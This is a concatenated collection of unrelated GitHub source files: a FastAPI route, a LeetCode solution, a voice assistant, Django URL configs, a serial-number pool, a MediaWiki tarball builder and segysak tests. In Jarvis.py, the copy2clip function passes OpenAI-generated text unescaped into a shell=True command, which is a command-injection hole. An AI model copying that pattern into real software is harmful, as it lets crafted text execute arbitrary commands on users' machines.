print(threading.current_thread().getName() + \"_action_\" + str(m))\n\n\n# 下面是主程序(也就是主线程的线程执行体)\nfor i in range(100):\n # 调用 threading 模块的 current_thread ()函数获取当前线程\n print(threading.current_thread().getName() + \"\" + str(i))\n if i == 20:\n # 创建并启动第一个线程\n t1 = threading.Thread(target=action, args=(100,))\n t1.start()\n # 
+{"seq_id":"14275206693","text":"from dependency_injector.wiring import Provide, inject\nfrom fastapi import APIRouter, Depends\n\nfrom domain.ports.get_order_details_port import OrderDetailsInputPort\nfrom domain.use_cases.get_order_details import GetOrderDetailsByIdUseCase\nfrom frameworks.container import FrameworkContainer\nfrom interface_adapters.dtos.get_order_details_dto import GetOrderDetailsOutputDTO\n\norder_details_route = APIRouter()\n\n\n@order_details_route.get(\n \"/order/details/{order_details_id}\", response_model=GetOrderDetailsOutputDTO\n)\n@inject\nasync def get_order_details(\n order_details_id: int,\n get_order_details_use_case: GetOrderDetailsByIdUseCase = Depends(\n Provide[FrameworkContainer.get_order_details_use_case]\n ),\n) -> GetOrderDetailsOutputDTO:\n \"\"\"Route that returns the details of a single order by its id\"\"\"\n try:\n input_port = OrderDetailsInputPort(order_details_id=order_details_id)\n\n output_use_case = await get_order_details_use_case(input_port=input_port)\n\n return GetOrderDetailsOutputDTO(\n order_details_id=output_use_case.order_details_id,\n order_id=output_use_case.order_id,\n pizza_id=output_use_case.pizza_id,\n quantity=output_use_case.quantity,\n )\n except Exception as error:\n return {\"error\": f\"{error}\"}\n","repo_name":"dtleal/gwtk_pizza_place","sub_path":"src/interface_adapters/routes/v1/get_order_details.py","file_name":"get_order_details.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"20284690825","text":"from typing import List\n\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n \"\"\"\n Mainly watch how the index shifts when deleting:\n you cannot keep iterating by index, because the length changes\n\n 1\n No need to call len every time; track it yourself\n\n 2\n No need for a pre pointer\n\n 3\n Noted down after reading the reference answer\n \"\"\"\n if not nums:\n return 0\n count = 0\n for i in range(1, len(nums)):\n if nums[count] != nums[i]:\n count += 1\n nums[count] = nums[i]\n return count + 1\n\n\nif __name__ == '__main__':\n Solution().removeDuplicates([1, 1, 2])\n","repo_name":"pingfangx/pythonx","sub_path":"ToolsX/leetcode/0026/0026_3.py","file_name":"0026_3.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"zh","doc_type":"code","stars":22,"dataset":"github-code","pt":"32"}
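A quick demonstration of the two-pointer dedup above, assuming the `Solution` class is in scope; the expected output follows from tracing the loop:

```python
# In-place removal of duplicates from a sorted list.
nums = [1, 1, 2, 2, 3]
k = Solution().removeDuplicates(nums)
print(k, nums[:k])  # 3 [1, 2, 3]
```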
+{"seq_id":"23176798673","text":"import os \nimport openai \nimport pvporcupine \nimport speech_recognition as sr\nimport struct\nimport pyaudio\nimport time\nimport pvcobra\nimport wave\nfrom pydub import AudioSegment\nfrom pydub.playback import play\nfrom gtts import gTTS \nfrom playsound import playsound\n\nimport yaml\n\nimport sys\nimport psutil\nimport logging\ndef read_yaml():\n with open('config.yaml', \"r\") as f:\n return yaml.safe_load(f)\nconf = read_yaml()\nPICOVOICEKEY = conf['Keys']['picovoice']\naikey = conf['Keys']['openai']\n\nimport subprocess\n\n\ndef copy2clip(txt):\n cmd='echo '+txt.strip()+'|clip'\n return subprocess.check_call(cmd, shell=True)\n\n\n\n\n\ncobra = pvcobra.create(access_key=PICOVOICEKEY)\n\nopenai.api_key = aikey\nvoice_file = \"voice.wav\"\nfilename = voice_file\nchunk = 1024\nFORMAT = pyaudio.paInt16\nchannels = 1\nsample_rate = 44100\np = pyaudio.PyAudio()\nstream = p.open(format=FORMAT,\n channels=channels,\n rate=sample_rate,\n input=True,\n output=True,\n frames_per_buffer=chunk)\nframes = []\n\nporcupine = pvporcupine.create(\n access_key=PICOVOICEKEY,keyword_paths=['Hey-Friday_en_windows_v2_2_0.ppn'],\n keywords=['Hey Jarvis']\n)\n\nr = sr.Recognizer()\n\n\n\nwake_word = 'hey assistant'\npa = pyaudio.PyAudio()\naudio_stream = pa.open(\n rate=porcupine.sample_rate,\n channels=1,\n format=pyaudio.paInt16,\n input=True,\n frames_per_buffer=porcupine.frame_length)\n\nprint(\"Listening for wake word ('{}')...\".format(wake_word))\n\nwhile True:\n pcm = audio_stream.read(porcupine.frame_length)\n pcm = struct.unpack_from(\"h\" * porcupine.frame_length, pcm)\n \n keyword_index = porcupine.process(pcm)\n if keyword_index >= 0:\n stream.start_stream()\n \n \n \n \n \n prompt = None\n\n\n start_time = time.time()\n\n while True:\n pcm = audio_stream.read(cobra.frame_length)\n pcm = struct.unpack_from(\"h\"*cobra.frame_length,pcm)\n voice_probability = cobra.process(pcm)\n\n data = stream.read(chunk)\n frames.append(data)\n\n if voice_probability <= 0.2:\n elapsed_time = time.time() - start_time\n if elapsed_time >= 2.0:\n stream.stop_stream()\n \n \n wf = wave.open(filename, \"wb\")\n wf.setnchannels(channels)\n wf.setsampwidth(p.get_sample_size(FORMAT))\n wf.setframerate(sample_rate)\n wf.writeframes(b\"\".join(frames))\n \n transcript = ' '\n\n with sr.AudioFile(filename) as source:\n text = None\n try: \n text = r.recognize_google(r.record(source),None,\"en-US\",0,False)\n except TypeError:\n text = None\n transcript = text\n print(transcript)\n \n \n \n \n \n if not isinstance(transcript, str):\n transcript = ' say \"sorry i didnt get that\"'\n wf.close()\n \n os.remove('voice.wav')\n prompt = 'your name will be Friday and your job is an AI Voice Assistant, here is your text, ' + transcript \n\n \n break\n\n else:\n start_time = time.time()\n\n\n\n\n \n \n response = openai.Completion.create(\n model=\"text-davinci-003\",prompt=prompt, temperature = 0,n=1)\n if 'choices' in response and len(response['choices']) > 0:\n message = response['choices'][0]['text']\n copy2clip(message)\n\n #\n tts = gTTS(text=message, lang='en', tld='co.za')\n tts.save('generated_message.mp3')\n\n \n audio_file = AudioSegment.from_file('generated_message.mp3',format='mp3')\n \n play(audio_file)\n \n\n \n else:\n print('Failed to generate a message using the OpenAI completion API.')\n print(\"Listening for wake word ('{}')...\".format(wake_word))\n","repo_name":"Coolcreeper221/Friday","sub_path":"Jarvis.py","file_name":"Jarvis.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
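The capture loop above keeps recording until Cobra's voice probability stays below 0.2 for two seconds in a row. Here is that endpointing pattern stripped of the audio stack, a sketch with the VAD and the stream replaced by a stub callable:

```python
# Record "frames" until the activity probability stays under `threshold`
# for `silence_secs` in a row; `next_probability` stands in for the VAD.
import time, random

def record_until_silence(next_probability, threshold=0.2, silence_secs=2.0):
    start = time.time()
    frames = []
    while True:
        prob = next_probability()
        frames.append(prob)      # stand-in for an audio frame
        time.sleep(0.05)         # simulate the frame cadence
        if prob <= threshold:
            if time.time() - start >= silence_secs:
                return frames    # enough consecutive silence: stop
        else:
            start = time.time()  # voice detected: reset the timer

print(len(record_until_silence(lambda: random.random() * 0.15)))
```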
+{"seq_id":"38401835526","text":"import logging\nimport copy\nlogger = None\nimport hashlib\n\ndef setup_logger(args):\n global logger\n if logger is None:\n logger = logging.getLogger()\n else: # wish there was a logger.close()\n for handler in logger.handlers[:]: # make a copy of the list\n logger.removeHandler(handler)\n\n args_copy = copy.deepcopy(args)\n # copy to get a clean hash\n # use the same log file hash if iterations or verbose are different\n # these flags do not change the results\n args_copy.iters = 1\n args_copy.verbose = False\n args_copy.log_interval = 1\n args_copy.seed = 0\n\n log_path = './log/{0}_{1}_{2}.log'.format(args.model, args.density, hashlib.md5(str(args_copy).encode('utf-8')).hexdigest()[:8])\n\n logger.setLevel(logging.INFO)\n formatter = logging.Formatter(fmt='%(asctime)s: %(message)s', datefmt='%H:%M:%S')\n\n fh = logging.FileHandler(log_path)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\ndef print_and_log(msg):\n global logger\n print(msg)\n logger.info(msg)\n","repo_name":"JiePKU/MIA-SafeCompress","sub_path":"log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"}
+{"seq_id":"13763232363","text":"from django.urls import path \nfrom . import views\n\napp_name = 'firstapp' # represents the app namespace (used when naming targets for screen transitions)\nurlpatterns = [\n path('index/',views.index,name='index'), # maps requests for index/ to the index function in the views file\n path('page/',views.user_page,name='user_page'),\n path('number_page//',views.number_page, name = 'number_page'),\n path('home',views.home, name = 'home')\n]","repo_name":"FatherPower/DjangoPractice","sub_path":"firstapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"21444449433","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^demo/ajax', views.ajax),\n url(r'^demo/commands/?$', views.test_commands),\n url(r'^demo/services/?$', views.test_services),\n url(r'^demo/pushkin/?$', views.test_pushkin),\n\n url(r'^grep/voip/tau-8/?$', views.grep_voip_config),\n url(r'^ping/(?P<ip>[0-9\\.]+)/$', views.ping),\n\n url(r'^disable/interface/?$', views.disable_interface),\n url(r'^enable/interface/?$', views.enable_interface),\n url(r'^ports/status/?$', views.ports_status),\n\n url(r'^$', views.index),\n]\n\n\n\n","repo_name":"ilique/webpushkin","sub_path":"pushkin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"33966552769","text":"import re\nfrom itertools import chain\n\nfrom typing import List, Union, Iterable, Generator, Optional, Callable\n\n# ---------- Custom typing ----------\nElementsType = List[Union[int, str]]\n\n\ndef serial_no_generator(lower: int = 0, upper: int = 10, reused: bool = True, values: Iterable[int] = None) -> \\\n Generator[int, None, None]:\n values = values or []\n eset = set(filter(lambda x: lower <= x < upper, values))\n if eset:\n max_val = max(eset)\n if reused:\n gen = chain(range(max_val + 1, upper), range(lower, max_val))\n else:\n gen = range(max_val + 1, upper)\n else:\n gen = range(lower, upper)\n for ele in gen:\n if ele in eset:\n continue\n yield ele\n\n\n_fmt_re = re.compile(r'\\{no(:0(\\d+)([bodxX]))?\\}')\n\nb2p_dict = {'b': 2, 'o': 8, 'd': 10, 'x': 16, 'X': 16}\np2b_dict = {2: 'b', 8: 'o', 10: 'd', 16: 'x'}\n\n\nclass LabelFormatOpts:\n def __init__(self, fmt_str, base=10, digits=2):\n\n base_char = p2b_dict[base]\n data = _fmt_re.findall(fmt_str)\n ft = [item[0] for item in data if item[0] != '']\n if ft:\n if all(el == ft[0] for el in ft):\n base_char = ft[0][-1]\n base, digits = b2p_dict.get(base_char), int(ft[0][2:-1])\n else:\n raise ValueError(f'{fmt_str} Define different formatter for no variable.')\n new_field_fmt = '{{no:0{0}{1}}}'.format(digits, base_char)\n\n self.origin_fmt = fmt_str\n self.normalized_fmt = _fmt_re.sub(new_field_fmt, fmt_str)\n\n fr_dict = {\n 'b': '(?P<no>[01]{{{0}}})'.format(digits),\n 'o': '(?P<no>[0-7]{{{0}}})'.format(digits),\n 'd': '(?P<no>[0-9]{{{0}}})'.format(digits),\n 'x': '(?P<no>[0-9a-f]{{{0}}})'.format(digits),\n 'X': '(?P<no>[0-9A-Z]{{{0}}})'.format(digits),\n }\n\n self.parse_re = re.compile(self.normalized_fmt.replace(new_field_fmt, fr_dict[base_char]))\n self.base = base\n self.digits = digits\n self.base_char = base_char\n\n def value2label(self, value: int) -> str:\n return self.normalized_fmt.format(no=value)\n\n def label2value(self, label: str) -> int:\n m = self.parse_re.match(label)\n if m:\n return int(m.group('no'), base=self.base)\n raise ValueError(f'Error Value {label}')\n\n\nclass SerialElement:\n __slots__ = ['value', 'label']\n\n def __init__(self, value, label):\n self.value = value\n self.label = label\n\n\nclass SerialNoPool:\n def __init__(self, lower: int = None, upper: int = None, base: int = 0, digits: int = 0,\n label_fmt: Optional[str] = None):\n\n if label_fmt is None:\n self._opts = None\n else:\n base = base or 10\n digits = digits or 2\n self._opts = LabelFormatOpts(label_fmt, base, digits)\n base = self._opts.base\n digits = self._opts.digits\n\n if lower is not None and lower < 0:\n raise ValueError(f'lower(={lower}) must be >= 0.')\n if upper is not None and upper <= 0:\n raise ValueError(f'upper(={upper}) must be >= 0.')\n s_set = base and digits\n t_set = lower is not None and upper is not None\n\n if t_set:\n self._lower, self._upper = lower, upper\n if s_set:\n cl, cu = 0, base ** digits\n if not (lower >= cl and upper <= cu):\n raise ValueError(f'The lower-upper [{lower},{upper}) is not in [{cl},{cu})')\n else:\n if s_set:\n self._lower, self._upper = 0, base ** digits\n else:\n self._lower, self._upper = 0, 100\n\n self._values = set()\n self._source = None\n\n # ---------- Pool Attributes ----------\n\n @property\n def lower(self):\n return self._lower\n\n @property\n def upper(self):\n return self._upper\n\n # ---------- Data API ----------\n\n def set_elements(self, elements: ElementsType) -> 'SerialNoPool':\n self._values = set()\n self.add_elements(elements)\n return self\n\n def set_source(self, source: Callable[[], ElementsType]) -> 'SerialNoPool':\n self._source = source\n return self\n\n def add_elements(self, elements: ElementsType) -> 'SerialNoPool':\n values = self._elements2values(elements)\n for v in values:\n self._values.add(v)\n return self\n\n def remove_elements(self, elements: ElementsType) -> 'SerialNoPool':\n values = self._elements2values(elements)\n for v in values:\n self._values.remove(v)\n return self\n\n def _elements2values(self, elements: ElementsType) -> List[int]:\n values = [] # type: List[int]\n for ele in elements:\n if isinstance(ele, int):\n value = ele\n elif isinstance(ele, str):\n value = self._opts.label2value(ele)\n else:\n raise TypeError(f'Invalid element {ele}:unsupported type.')\n if self._lower <= value < self._upper:\n values.append(value)\n else:\n raise ValueError(f'Invalid element {ele}: range error')\n return values\n\n # ---------- Generate API ----------\n\n def get_next_generator(self) -> Generator[SerialElement, None, None]:\n \"\"\"\n This is the low-level method.\n :return:\n \"\"\"\n if self._source is not None:\n elements = self._source()\n self.set_elements(elements)\n value_gen = serial_no_generator(lower=self._lower, upper=self._upper, values=self._values)\n for value in value_gen:\n if self._opts:\n label = self._opts.value2label(value)\n else:\n label = None\n yield SerialElement(value, label)\n\n def generate_values(self, num=1) -> List[int]:\n return [se.value for se in self.get_next_generator()][:num]\n\n def generate_labels(self, num=1) -> List[str]:\n if self._opts is None:\n raise TypeError('The 
operation generate_labels is not allowed when label_fmt is not set.')\n return [se.label for se in self.get_next_generator()][:num]\n\n def generate(self, num=1) -> List[str]:\n return self.generate_labels(num)\n","repo_name":"kinegratii/borax","sub_path":"borax/counters/serial_pool.py","file_name":"serial_pool.py","file_ext":"py","file_size_in_byte":6334,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"32"} +{"seq_id":"35720542878","text":"#!/usr/bin/env python3\n\"\"\"\nnightly.py - tarball creator\n\nThis is a script that creates tarballs\nfor MediaWiki extensions based on the\nconfiguration in conf.py. It accepts\nsome optional arguments:\n\n* --all: Generate tarballs for all extensions.\n* --skins: Process skins instead of extensions\n* --force: Regenerate all tarballs even if they already exist\n\nBy default, it generates only the tarball for the\nVisualEditor extension (or the Vector skin if\n--skins is passed). This will change in the future\nwhen debugging becomes less rare.\n\"\"\"\n\nimport glob\nimport json\nimport logging\nimport os\nimport random\nimport requests\nimport subprocess\nimport sys\nimport traceback\n\n\nclass TarballGenerator(object):\n def __init__(self, conf, repo_type='extensions', force=False):\n self.API_URL = conf['API_URL']\n self.DIST_PATH = conf['DIST_PATH']\n self.GIT_URL = conf['GIT_URL']\n self.LOG_FILE = conf['LOG_FILE']\n self.SRC_PATH = conf['SRC_PATH']\n self.PID_FILE = conf['PID_FILE']\n self.LOG_FILE = conf['LOG_FILE']\n self.REPO_TYPE = repo_type\n self.EXT_PATH = os.path.join(self.SRC_PATH, self.REPO_TYPE)\n self.COMPOSER = conf.get('COMPOSER')\n self._repo_list = None\n self._extension_config = None\n self.force = force\n self.session = requests.Session()\n\n @property\n def repo_list(self):\n \"\"\"\n Lazy-load the list of all extensions\n \"\"\"\n if self._repo_list is None:\n self._repo_list = self.fetch_all_repos()\n return self._repo_list\n\n def fetch_all_repos(self):\n \"\"\"\n Does an API request to get the complete list of extensions.\n Do not call directly.\n \"\"\"\n logging.debug('Fetching list of all %s...' 
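Putting the pieces of `serial_pool.py` together, a short usage sketch of the class defined above; the label format and the taken values are chosen arbitrarily:

```python
# SerialNoPool hands out the lowest free numbers after the highest taken one
# (wrapping around, since serial_no_generator defaults to reused=True).
pool = SerialNoPool(label_fmt='LC{no:03d}')      # decimal labels LC000..LC999
pool.set_elements(['LC000', 'LC001', 'LC002'])   # labels already in use
print(pool.generate_values(2))                   # [3, 4]
print(pool.generate_labels(2))                   # ['LC003', 'LC004']

# A callable source is re-read on every generation run.
pool.set_source(lambda: [0, 1, 5])
print(pool.generate(3))                          # ['LC006', 'LC007', 'LC008']
```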
% self.REPO_TYPE)\n data = {\n 'action': 'query',\n 'list': 'extdistrepos',\n 'format': 'json'\n }\n r = self.session.get(self.API_URL, params=data)\n r.raise_for_status()\n return r.json()['query']['extdistrepos'][self.REPO_TYPE]\n\n @property\n def supported_versions(self):\n \"\"\"\n Lazy-load the list of supported branches\n \"\"\"\n if self._extension_config is None:\n self.fetch_extension_config()\n return self._extension_config['snapshots']\n\n def fetch_extension_config(self):\n \"\"\"\n Fetch the ExtensionDistributor configuration from the API\n Do not call this directly.\n \"\"\"\n logging.debug('Fetching ExtensionDistributor config from API...')\n data = {\n 'action': 'query',\n 'meta': 'siteinfo',\n 'format': 'json',\n }\n r = self.session.get(self.API_URL, params=data)\n r.raise_for_status()\n resp = r.json()\n self._extension_config = resp['query']['general']['extensiondistributor']\n\n return {\n 'versions': resp['query']['general']['extensiondistributor']['snapshots'],\n 'extension-list': resp['query']['general']['extensiondistributor']['list']\n }\n\n def init(self):\n \"\"\"\n Does basic initialization\n \"\"\"\n # Set up logging\n logging.basicConfig(\n filename=self.LOG_FILE,\n level=logging.DEBUG,\n format='%(asctime)s %(levelname)s:%(message)s'\n )\n\n # Check to make sure nightly.py isn't already running\n if os.path.exists(self.PID_FILE):\n with open(self.PID_FILE, 'r') as f:\n old_pid = f.read()\n\n if self.check_pid(int(old_pid)):\n logging.warning('Another process of nightly.py is still running, quitting this one')\n quit()\n\n self.create_pid_file()\n\n # Init some directories we'll need\n if not os.path.isdir(self.EXT_PATH):\n self.shell_exec(['mkdir', '-p', self.EXT_PATH])\n if not os.path.isdir(self.DIST_PATH):\n self.shell_exec(['mkdir', '-p', self.DIST_PATH])\n\n def shell_exec(self, args, **kwargs):\n \"\"\"\n Shortcut wrapper to execute a shell command\n\n >>> self.shell_exec(['ls', '-l'])\n \"\"\"\n return subprocess.check_output(args, **kwargs).decode()\n\n def update_extension(self, ext):\n \"\"\"\n Fetch an extension's updates, and\n create new tarballs if needed\n \"\"\"\n full_path = os.path.join(self.EXT_PATH, ext)\n logging.info('Starting update for %s' % ext)\n repo_url = self.GIT_URL % ext\n if not os.path.exists(full_path):\n os.chdir(self.EXT_PATH)\n logging.debug('Cloning %s' % ext)\n self.shell_exec(['git', 'clone', repo_url, ext])\n pass\n for branch in self.supported_versions:\n os.chdir(full_path)\n logging.info('Creating %s for %s' % (branch, ext))\n # In case GIT_URL has changed\n self.shell_exec(['git', 'remote', 'set-url', 'origin', repo_url])\n # Update remotes\n self.shell_exec(['git', 'fetch'])\n try:\n # Could fail if repo is empty\n self.shell_exec(['git', 'reset', '--hard', 'origin/master'])\n # Reset everything!\n self.shell_exec(['git', 'clean', '-ffdx'])\n # Checkout the branch\n self.shell_exec(['git', 'checkout', 'origin/%s' % branch])\n except subprocess.CalledProcessError:\n # Just a warning because this is expected for some extensions\n logging.warning('could not checkout origin/%s' % branch)\n continue\n # Reset everything, again.\n self.shell_exec(['git', 'clean', '-ffd'])\n # Sync submodules in case their urls have changed\n self.shell_exec(['git', 'submodule', 'sync'])\n # Update them, initializing new ones if needed\n self.shell_exec(['git', 'submodule', 'update', '--init'])\n # Gets short hash of HEAD\n rev = self.shell_exec(['git', 'rev-parse', '--short=7', 'HEAD']).strip()\n tarball_fname = '%s-%s-%s.tar.gz' % 
(ext, branch, rev)\n if not self.force and os.path.exists(os.path.join(self.DIST_PATH, tarball_fname)):\n logging.debug('No updates to branch, tarball already exists.')\n continue\n if self.COMPOSER and os.path.exists('composer.json'):\n with open('composer.json') as f_composer:\n d_composer = json.load(f_composer)\n if 'require' in d_composer:\n logging.debug('Running composer install for %s' % ext)\n try:\n self.shell_exec([self.COMPOSER, 'install', '--no-dev', '--ignore-platform-reqs'])\n except subprocess.CalledProcessError:\n logging.error(traceback.format_exc())\n logging.error('composer install failed')\n # Create gitinfo.json to be read/displayed by Special:Version\n git_info = {}\n with open('.git/HEAD') as f_head:\n head = f_head.read()\n if head.startswith('ref:'):\n head = head[5:] # Strip 'ref :'\n git_info['head'] = head\n # Get the SHA-1\n git_info['headSHA1'] = self.shell_exec(['git', 'rev-parse', 'HEAD'])\n git_info['headCommitDate'] = self.shell_exec(['git', 'show', '-s', '--format=format:%ct', 'HEAD'])\n if head.startswith('refs/heads'):\n gi_branch = head.split('/')[-1]\n else:\n gi_branch = head\n git_info['branch'] = gi_branch\n git_info['remoteURL'] = self.GIT_URL % ext\n with open('gitinfo.json', 'w') as f:\n json.dump(git_info, f)\n\n # TODO: Stop writing this file now that we have gitinfo.json\n # Create a 'version' file with basic info about the tarball\n with open('version', 'w') as f:\n f.write('%s: %s\\n' % (ext, branch))\n f.write(self.shell_exec(['date', '+%Y-%m-%dT%H:%M:%S']) + '\\n') # TODO: Do this in python\n f.write(rev + '\\n')\n old_tarballs = glob.glob(os.path.join(self.DIST_PATH, '%s-%s-*.tar.gz' % (ext, branch)))\n logging.debug('Deleting old tarballs...')\n for old in old_tarballs:\n # FIXME: Race condition, we should probably do this later on...\n os.unlink(old)\n os.chdir(self.EXT_PATH)\n # Finally, create the new tarball\n self.shell_exec(['tar', '--exclude', '.git', '-czhPf', tarball_fname, ext])\n logging.debug('Moving new tarballs into dist/')\n tarballs = glob.glob(os.path.join(self.EXT_PATH, '*.tar.gz'))\n for tar in tarballs:\n fname = tar.split('/')[-1]\n os.rename(tar, os.path.join(self.DIST_PATH, fname))\n logging.info('Finished update for %s' % ext)\n\n if random.randint(0, 99) == 0:\n # Run git gc every 100th process (statistically)\n self.shell_exec(['git', 'gc'], cwd=full_path)\n\n def check_pid(self, pid):\n \"\"\"\n Checks whether the given pid is running\n \"\"\"\n try:\n # This doesn't actually kill it, just checks if it is running\n os.kill(pid, 0)\n except OSError:\n # Not running\n return False\n else:\n # So it must be running\n return True\n\n def create_pid_file(self):\n \"\"\"\n Creates a pid file with the current pid\n \"\"\"\n with open(self.PID_FILE, 'w') as f:\n f.write(str(os.getpid()))\n logging.info('Creating pid file')\n\n def run(self, repos=None):\n self.init()\n if not repos:\n repos = self.repo_list\n logging.info('Processing %s %s' % (len(repos), self.REPO_TYPE))\n logging.info('Starting update of all %s...' % self.REPO_TYPE)\n for repo in repos:\n try:\n self.update_extension(repo)\n except KeyboardInterrupt:\n logging.error(traceback.format_exc())\n sys.exit(1)\n except Exception:\n logging.error(traceback.format_exc())\n logging.error('Updating %s failed, skipping' % repo)\n logging.info('Finished update of all %s!' 
% self.REPO_TYPE)\n\n\ndef main():\n # Load our config from JSON\n conf = None\n skins = '--skins' in sys.argv\n etc_path = '/etc/skindist.conf' if skins else '/etc/extdist.conf'\n local_fname = 'skinconf.json' if skins else 'conf.json'\n if os.path.exists(etc_path):\n with open(etc_path, 'r') as f:\n conf = json.load(f)\n elif os.path.exists(os.path.join(os.path.dirname(__file__), local_fname)):\n with open(os.path.join(os.path.dirname(__file__), local_fname), 'r') as f:\n conf = json.load(f)\n else:\n print('extdist is not configured properly.')\n quit()\n if '--all' in sys.argv:\n repos = []\n elif skins:\n repos = ['Vector']\n else:\n repos = ['VisualEditor']\n for arg in sys.argv:\n if arg.startswith('--repo'):\n repos.append(arg.split('=', 1)[1])\n repo_type = 'skins' if skins else 'extensions'\n force = '--force' in sys.argv\n generator = TarballGenerator(conf, repo_type=repo_type, force=force)\n generator.run(repos=repos)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wikimedia/labs-tools-extdist","sub_path":"nightly.py","file_name":"nightly.py","file_ext":"py","file_size_in_byte":11493,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"43285861310","text":"import time\n\nimport numpy as np\nfrom constants import LEVEL2, ACTIONS, GameStatus\nfrom Level import Level\nfrom WYB import WatchYourBack\nfrom map_utilities import clear_console_output, encode_map_numeric, print_map\nfrom dql import DQNAgent\n\ngame = WatchYourBack(Level(LEVEL2))\nstate_size = len(LEVEL2)**2\nagent = DQNAgent(state_size, 4)\nagent.epsilon = 0\nagent.load(\"./save/level2.h5\")\n\nclear_console_output()\nprint_map(game.level.level)\ntime.sleep(2)\n\nwhile game.status == GameStatus.ONGOING:\n state = encode_map_numeric(game.level.level)\n player_move = agent.act(np.reshape(state, [1, state_size]))\n\n game.move_player(ACTIONS[player_move])\n clear_console_output()\n print_map(game.level.level)\n time.sleep(2)\n\n game.move_enemies()\n clear_console_output()\n print_map(game.level.level)\n time.sleep(2)\n\nprint('Result:', game.status)","repo_name":"yortuc/backGame","sub_path":"trainer/dql_play.py","file_name":"dql_play.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"5303542727","text":"import numpy as np\n\nimport pytest\n\nfrom hypothesis import given, assume, settings\nfrom hypothesis.strategies import integers, text, floats, tuples, sampled_from\nfrom hypothesis.extra.numpy import arrays\n\nfrom segysak._seismic_dataset import (\n _check_vert_units,\n _check_input,\n _dataset_coordinate_helper,\n)\nfrom segysak._seismic_dataset import (\n create_seismic_dataset,\n create2d_dataset,\n create3d_dataset,\n)\n\nfrom segysak._keyfield import VerticalUnits, VerticalKeyField\n\n\nclass TestCheckers:\n \"\"\"\n Test data checking utilities\n \"\"\"\n\n def test_check_input_does_nothing_to_None(self):\n assert _check_input(None) is None\n\n @given(integers(0, 100000))\n def test_check_input_turns_int_into_array(self, i):\n assert len(_check_input(i)) == i\n\n def test_check_input_converts_to_array(self):\n assert isinstance(_check_input([0, 0]), np.ndarray)\n\n def test_check_input_raises_error_at_multidimensions(self):\n with pytest.raises(ValueError):\n _check_input([[0, 0]])\n\n @pytest.mark.parametrize(\"u\", list(VerticalUnits))\n def test_vertical_units_pass_checking(self, u):\n assert _check_vert_units(u) == u\n\n @given(text())\n def 
test_illegal_vertical_units_raise_errors(self, t):\n assume(t not in list(VerticalUnits))\n with pytest.raises(ValueError):\n _check_vert_units(t)\n\n @pytest.mark.parametrize(\"p\", list(VerticalKeyField.values()))\n def test_domains_pass_checking(self, p):\n _, domain = _dataset_coordinate_helper(None, p)\n assert p == domain\n\n @given(text())\n def test_illegal_domain_raise_errors(self, t):\n assume(t not in list(VerticalKeyField.values()))\n with pytest.raises(ValueError):\n _dataset_coordinate_helper(None, t)\n\n\nclass TestCreateSeismicDataset:\n \"\"\"\n Test creating a seismic dataset with various dimensions and sizes\n \"\"\"\n\n @given(integers(0, 10000), integers(0, 100000))\n def test_create_2D_seismic_dataset_with_integers(self, s, t):\n dataset = create_seismic_dataset(\n twt=s, depth=None, cdp=t, iline=None, xline=None, offset=None\n )\n assert len(dataset.dims) == 2\n assert dataset.dims[\"twt\"] == s\n\n @given(integers(0, 45))\n @settings(max_examples=10)\n def test_create_2D_seismic_dataset_with_offsets(self, o):\n dataset = create_seismic_dataset(\n twt=100, depth=None, cdp=1000, iline=None, xline=None, offset=o\n )\n assert len(dataset.dims) == 3\n\n @given(integers(0, 10000), integers(0, 100000), integers(0, 100000))\n def test_create_3D_seismic_dataset_with_integers(self, s, i, x):\n dataset = create_seismic_dataset(\n twt=None, depth=s, cdp=None, iline=i, xline=x, offset=None\n )\n assert len(dataset.dims) == 3\n assert dataset.dims[\"depth\"] == s\n\n @given(\n arrays(float, shape=integers(0, 10000), elements=floats(-1000, 1000)),\n integers(0, 10000),\n )\n def test_create_2D_seismic_dataset_with_arrays(self, a, t):\n dataset = create_seismic_dataset(\n twt=a, depth=None, cdp=t, iline=None, xline=None, offset=None\n )\n assert len(dataset.dims) == 2\n assert dataset.dims[\"twt\"] == len(a)\n\n @given(integers(0, 100))\n @settings(max_examples=10)\n def test_create_2D_seismic_dataset_with_multiple_dimensions(self, d):\n dims = {str(i): i for i in range(d)}\n dataset = create_seismic_dataset(\n twt=100, depth=None, cdp=1000, iline=None, xline=None, offset=None, **dims\n )\n assert len(dataset.dims) == d + 2\n\n def test_mutally_not_allowed_arguments(self):\n with pytest.raises(ValueError):\n ds = create_seismic_dataset(cdp=100, iline=100, xline=100)\n\n with pytest.raises(ValueError):\n ds = create_seismic_dataset(cdp=100, iline=100)\n\n with pytest.raises(ValueError):\n ds = create_seismic_dataset(cdp=100, xline=100)\n\n def test_mutually_required_arguments(self):\n\n with pytest.raises(ValueError):\n ds = create_seismic_dataset(iline=100)\n\n with pytest.raises(ValueError):\n ds = create_seismic_dataset(xline=100)\n\n\nclass TestCreate2DDataset:\n \"\"\"\n Test creating 2D datasets with various shapes\n \"\"\"\n\n @given(integers(1, 10000), integers(0, 100), integers(1, 100))\n def test_create_2D_dataset_custom_sampling(self, s, f, r):\n dataset = create2d_dataset(\n dims=(100, s), first_sample=f, sample_rate=r, vert_domain=\"TWT\"\n )\n assert dataset.twt.data.max() == f + s * r - r\n\n @given(integers(1, 10000), integers(0, 100), integers(1, 